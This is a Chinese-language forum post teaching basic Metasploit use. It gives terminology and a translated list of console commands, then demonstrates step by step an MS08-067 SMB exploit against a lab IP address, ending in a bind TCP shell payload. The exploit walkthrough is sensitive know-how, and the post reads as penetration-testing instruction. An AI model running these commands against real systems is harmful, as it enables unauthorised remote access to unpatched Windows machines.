Metasploit MSF 的基本使...
 
Notifications
Clear all

Metasploit MSF 的基本使用方法教程漏洞利用

1 Posts
1 Users
0 Likes
2,090 Views
(@taichi)
Member
Joined: 4 years ago
Posts: 408
Topic starter  

Metasploit简介

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。
仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。
软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
 

专业术语

渗透攻击(Exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。
攻击载荷(Payload),是我们期望目标系统在被渗透攻击之后去执行的代码。
Shellcode,是在渗透攻击是作为攻击载荷运行的一组机器指令,通常用汇编语言编写。
模块(Module),指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作。
监听器(Listener),是Metasploit中用来等待网络连接的组件。
更多内容:
1、Metasploit下载: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
2、Metasploit入门: https://www.metasploit.com/get-started
3、Metasploit手册: https://metasploit.help.rapid7.com/docs
 

基本命令

========== 帮助菜单 ==========
banner   显示一个真棒
metasploit横幅
cd   更改当前的工作目录
color   切换颜色
connect   连接与主机通信
exit   退出控制台
get   获取特定于上下文的变量的值
getg   获取全局变量的值
grep grep另一个命令的输出
help   帮助菜单
history   显示命令历史
irb   进入irb脚本模式
load   加载一个框架插件
quit   退出控制台
route   通过会话路由流量
save   保存活动的数据存储
sessions    转储会话列表并显示有关会话的信息
set   将特定于上下文的变量设置为一个值
setg   将全局变量设置为一个值
sleep   在指定的秒数内不做任何事情
spool   将控制台输出写入文件以及屏幕
threads   线程查看和操作后台线程
unload   卸载框架插件
unset   取消设置一个或多个特定于上下文的变量
unsetg   取消设置一个或多个全局变量
version   显示框架和控制台库版本号


========== 模块命令 ==========
advanced   显示一个或多个模块的高级选项
back   从当前上下文返回
edit   使用首选编辑器编辑当前模块
info   显示有关一个或多个模块的信息
loadpath   路径从路径搜索并加载模块
options   显示全局选项或一个或多个模块
popm   将最新的模块从堆栈中弹出并使其处于活动状态
previous   将之前加载的模块设置为当前模块
pushm   将活动或模块列表推入模块堆栈
reload_all   从所有定义的模块路径重新加载所有模块
search   搜索模块名称和描述
show   显示给定类型的模块或所有模块
use   按名称选择模块


========== 工作命令 ==========
handler   作为作业启动负载处理程序
jobs   显示和管理作业
kill   杀死一个工作
rename_job   重命名作业


========== 资源脚本命令 ==========
makerc   保存从开始到文件输入的命令
resource   运行存储在文件中的命令


========== 数据库后端命令 ==========
db_connect   连接到现有的数据库
db_disconnect   断开与当前数据库实例的连接
db_export   导出包含数据库内容的文件
db_import   导入扫描结果文件(文件类型将被自动检测)
db_nmap   执行nmap并自动记录输出
db_rebuild_cache   重建数据库存储的模块高速缓存
db_status   显示当前的数据库状态
hosts   列出数据库中的所有主机
loot   列出数据库中的所有战利品
notes   列出数据库中的所有笔记
services   列出数据库中的所有服务
vulns   列出数据库中的所有漏洞
workspace   在数据库工作区之间切换


========== 凭证后端命令 ==========
creds   列出数据库中的所有凭据
 

漏洞演示

Metasploit MS08-067 漏洞利用演示:
1、启动msf

msfconsole


 
2、搜索模块

search ms08_067


 
3、使用模块

use exploit/windows/smb/ms08_067_netapi


 
4、查看需要配置的参数,Required为yes就是必须要填的参数

show options


 
5、设置目标IP

set RHOST 192.168.0.102


 
6、查看可用payload

show payloads


 
7、使用payload

set payload windows/shell/bind_tcp


 
8、查看可用选择的系统(这里我就不设置了他会自动选择)

 
9、检测是否存在漏洞(部分模块可能没有)

check


 
10、运行模块

exploit 或者 run


 
11、解决metasploit乱码

 
12、OK 成功解决


   
Quote
Share: